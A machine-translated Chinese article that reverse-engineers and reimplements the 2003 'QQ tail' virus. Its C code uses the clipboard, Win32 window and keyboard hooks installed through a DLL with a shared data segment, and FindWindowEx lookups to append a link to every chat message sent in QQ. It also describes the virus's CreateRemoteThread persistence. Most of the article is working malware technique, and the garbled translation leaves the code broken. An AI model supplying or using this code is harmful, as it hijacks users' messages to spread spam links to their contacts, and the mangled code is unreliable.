Research on the realization of QQ tail virus core technology

2003 this year, QQ tail virus can be regarded as scenery for a while. It uses IE's mail head loophole to spread wildly on QQ. Poisoning in the message to others, the virus will automatically add a word behind the message text, the content of a variety of words, in short, is the recipient of the message to click on the URL, become the next poisoned.

The following I will discuss, is the QQ tail virus to use this technology. Because the source of the virus is not available, so the following code is all my subjective gain, fortunately, the effect is basically the same as the virus itself.
Paste Tail

One of the easiest questions to start with is how to add text. This technology has no secrets, that is, through the Clipboard to the QQ message that RichEdit "paste" on a word. The code is as follows:
TCHAR g_str[] = "Welcome to my small station to sit: http://titilima.nease.net";
function function: Paste the tail into the text box
void Pastetext (HWND Hrich)
{
Hglobal Hmem;
LPTSTR pstr;
Allocating memory space
Hmem = GlobalAlloc (ghnd | Gmem_share, sizeof (G_STR));
Pstr = GlobalLock (HMEM);
lstrcpy (Pstr, G_STR);
GlobalUnlock (HMEM);
OpenClipboard (NULL);
EmptyClipboard ();
Set Clipboard text
SetClipboardData (Cf_text, Hmem);
CloseClipboard ();
Free up memory space
GlobalFree (HMEM);
Paste Text
SendMessage (Hrich, wm_paste, 0, 0);
}

Hook

OK, so the question below is, when should this text be posted? Some of the online research on the implementation of the QQ tail pointed out that the timer can be used to control the pasting time, similar to this:
void Cqqtaildlg::ontimer (UINT nidevent)
{
Pastetext (Hrich);
}
This is indeed a solution, but it also has great limitations--how to set the timer interval? Perhaps the poisoned person is typing, the tail text "Swish" appeared ...
However, the virus itself is not the case, and it can accurately paste the text when you click "Send" or press the Ctrl+enter key. In January 2003, one of my P2 has been poisoned, because the system is slow, so you can clearly see the timing of text pasting.
In this case, the facts I have stated will certainly make you the reader: Hook! -Yes, that's the hook, what I'm talking about here is using a hook to truly reproduce the "QQ tail virus" technology.
First I make a brief introduction to the hook, and friends who are already familiar with the hooks can skip this paragraph. The so-called Win32 hook is not an artificial arm of the captain of the hook, but a piece of procedure that can be used to monitor, detect, and perform certain functions in a particular message in the system. For example, your program is the emperor, the Windows system as the governor of the provinces, as for the hook, it can be regarded as a governors of the emperor. such as the emperor under the purpose of the national tax, and then sent a governors to find the governor of Shanxi said: "The emperor has decreed that Shanxi, in addition to normal taxes, add to the 10 altar." ”（-_-#...... As the emperor can treat particular governor in this way, programmers can also use hooks to capture specific messages in the Windows system.
The problem is specific to the "QQ tail virus" above, is that we need a hook, after the user clicked the "Send" button, paste our text. The hook process I implemented is (as for how to hook this hook, I'll explain later):
Hook process, monitoring "send" command messages
LRESULT CALLBACK callwndproc (int ncode, WPARAM WPARAM, LPARAM LPARAM)
{
Cwpstruct *p = (cwpstruct *) LParam;
Capture the Send button
if (p->message = = Wm_command && loword (p->wparam) = = 1)
Pastetext (G_hrich);
Return CallNextHookEx (G_hproc, Ncode, WParam, LParam);
}
Here I explain a few things about this callback process:
1, lparam is a pointer to the CWPSTRUCT structure, this structure is described as follows:
typedef struct {
LPARAM LPARAM;
WPARAM WPARAM;
UINT message;
HWND hwnd;
} cwpstruct, *pcwpstruct;
The SDK fans like me are probably going to smile: Is this not the four-iron parameter of the window callback? As you said, it is true that you can even use the hook function written by the switch (p->message) {/*//} to take over the QQ window completely.
2, G_hrich is a global variable, it holds the QQ message text box handle. The global variable is used here because I cannot get this handle from the parameters of the keyboard hook callback function. As for how to get this handle and the special position of this global variable, I will explain later.
3, CallNextHookEx is called Hook chain in the next processing process, changed the governors will say: "The ten Altar of the governors of the village wine has been accepted for the emperor, now please the governor of the Gui normal tax pay up." ”（-_-#...... This is a very important part of the writing hook function, if missing this sentence, then may cause the system hook chain to be wrong, some programs also will not respond--in fact, I write this simulation program when the QQ is lost a few times.
4, you may ask why I caught the WM_COMMAND message, this reason let me use the following SDK code (although QQ is written in MFC, but with the SDK code to explain the relationship between Wm_command and "send" button) to explain:
#define IDC_BTN_SENDMSG 1//"Send" button ID's macro definition
QQ Send Message dialog box callback process • Li Ma forged version
Lresult CALLBACK Procsenddlg (HWND hdlg, UINT Msg, WPARAM WPARAM, LPARAM LPARAM)
{
Switch (MSG)
{
Case WM_CLOSE:
EndDialog (hdlg, 0);
Break
Case WM_COMMAND:
{
Switch (LOWORD (wParam))
{
Case IDC_BTN_SENDMSG:
Send Message ...
Break
Other command button handling section ...
}
}
Break
The other case section ...
}
return 0;
}
The whole process of sending a message is that when the user clicks the Send button, the parent window of the button (that is, the "Send Message" dialog box) receives a WM_COMMAND notification message, where the WParam low word (that is, LoWord (WParam)) is the ID of the button, It then invokes the part of the code that is sent, as shown in the following diagram:

So here I am capturing WM_COMMAND messages more effectively than capturing other messages or hooking up the mouse hooks.
Well, now this hook is ready to finish the job successfully. But do not forget: More users prefer to use the "Ctrl+enter" hotkey to send messages, so the program also needs to hang a keyboard hook:
Keyboard hook process, monitoring "send" hot Key message
LRESULT CALLBACK keyboardproc (int ncode, WPARAM WPARAM, LPARAM LPARAM)
{
Capturing Hotkey Messages
if (WParam = = Vk_return && getasynckeystate (Vk_control) < 0 && lParam >= 0)
Pastetext (G_hrich);
Return CallNextHookEx (G_hkey, Ncode, WParam, LParam);
}
The only thing to explain here is the lparam >= 0 clause. Obviously this if judgment is in judging the hotkey ctrl+enter input, then what is lparam >= 0? In fact, in the callback of the keyboard hook, LPARAM is an important parameter that contains information about the number of keystrokes, scan codes, extension key flags, and so on. The highest bit of lparam (0x80000000) indicates whether the current key is being pressed, and if the bit is being pressed, this bit is 0, or 1. So the meaning of lparam >= 0 is to call Pastetext when Wm_keydown, that is, if you remove this condition, Pastetext will be called two times (together with Wm_keyup).

Hook up hooks and lookup window

The next step is how to hook up the two hooks. For hooking hooks, the question to be solved is: where to hook up hooks and how to hook up?
Hook to hook the target, must be QQ "Send information" window belongs to the thread. My code is to hook up the handle of this window after it is passed in:
Hook up Hooks
BOOL WINAPI Sethook (HWND hqq)
{
BOOL bRet = FALSE;
if (hqq!= NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId (HQQ, NULL);
Thanks to friends Hottey Search code, save my use of Spy + + Trouble
G_hrich = GetWindow (GetDlgItem (hqq, 0), gw_child);
if (G_hrich = NULL)
return FALSE;
Hook up Hooks
G_hproc = SetWindowsHookEx (Wh_callwndproc, Callwndproc, G_hinstdll, dwThreadID);
G_hkey = SetWindowsHookEx (Wh_keyboard, Keyboardproc, G_hinstdll, dwThreadID);
BRet = (G_hproc!= null) && (G_hkey!= null);
}
Else
{
Uninstall Hook
BRet = UnhookWindowsHookEx (g_hproc) && UnhookWindowsHookEx (G_hkey);
G_hproc = NULL;
G_hkey = NULL;
G_hrich = NULL;
}
return bRet;
}
So far, all of the above code is located in a Hook.dll dynamic link library, about the DLL I do not introduce, please consult the relevant information on MSDN and this article's supporting source code.
DLL has done all the important work (in fact this part of the work can only be done by the DLL, which is determined by the Windows virtual Memory mechanism), we only need to invoke the exported Sethook function in the EXE. So, how do you get Sethook's parameters? Please see the following code:
Thanks to friends Hottey Search code, save my use of Spy + + Trouble
HWND Hsend;
G_HQQ = NULL;
Sethook (NULL);
Todo
{
G_HQQ = FindWindowEx (null, G_HQQ, "#32770", null);
Hsend = FindWindowEx (G_HQQ, NULL, "button", "Send (&s)");
while (g_hqq!= null && hsend = null);
if (g_hqq!= NULL)
Sethook (G_HQQ);
The Do-while loop in this code is used to find the "Send Message" window. The privacy of the QQ window is getting stronger, the window layer is set up a layer, find very inconvenient, so thanks to friends Hottey "QQ message Bomb random" a article saves me repeatedly using Spy + + trouble. All I did was translate the Delphi code in his text into C code.

Shared data segments for DLLs

If you don't know much about DLLs, you'll definitely have some questions about the following code after you read my companion source code:
Defining shared data Segments
#pragma data_seg ("shared")
Hhook G_hproc = NULL; Window procedure Hook handle
Hhook G_hkey = NULL; Keyboard hook handle
HWND G_hrich = NULL; text box handle
#pragma data_seg ()
#pragma COMMENT (linker, "/SECTION:SHARED,RWS")
This defines a shared segment of data, yes, since my comments have been written very clearly, what does the shared data segment do? Before I answer this question, I ask you to comment out the preprocessing instructions in the code that start with # and recompile the DLL and run, what will you find?
Yes, adding tails failed!
Well, let me explain the problem. The main program of our emulator EXE, DLL, and QQ is actually the following relationship:

This DLL needs to map an instance to the address space of the EXE for its invocation, and it also needs to map another instance to the QQ address space to complete the hook work. In other words, when the hook is hooked up, there are two DLL instances in the entire system module! This DLL is not a DLL, so there is no connection between them. Take the global variable G_hrich, the DLL on the left of the diagram gets the handle to the text box, but if there is no shared segment, the G_hrich is still null in the DLL on the right. Share the meaning of the paragraph is also reflected in order to ensure that the EXE, DLL, QQ and the relationship between the three. This is somewhat like a static member variable in C + +.
Once the hook is hooked up, you can look through the process manager with the module view, and you'll find that Hook.dll is also in the QQ.exe module.

The last thing to say

1, I said before, in 2003 January I ran into the virus, so far I still very clearly remember that the virus EXE only 16KB size, so from the nature of the virus itself, this thing should be used win32asm to write will be more practical.
2, the virus I used to kill the hand-using a process to view the tool was killed. But now the "QQ tail" adds to the Resurrection function-after the EXE is killed, the DLL will wake it up. I have used my process view tool to analyze that almost all of the processes in the system have been caught by a virus DLL. The technique is to use CreateRemoteThread to insert an additional resurrection thread on all processes, which is really stone--to ensure that the exe runs forever, and that the DLL in use cannot be deleted. This technology I have also achieved, but the stability of the virus itself is far from excellent, so this will not be written out, interested friends can refer to Jeffrey Richter "Windows core programming," the relevant chapters.
3, Shi This thought of Houtie teacher "STL Source Analysis" in a word-"source code, no secret." "If you feel this way after reading this, then I would be honored."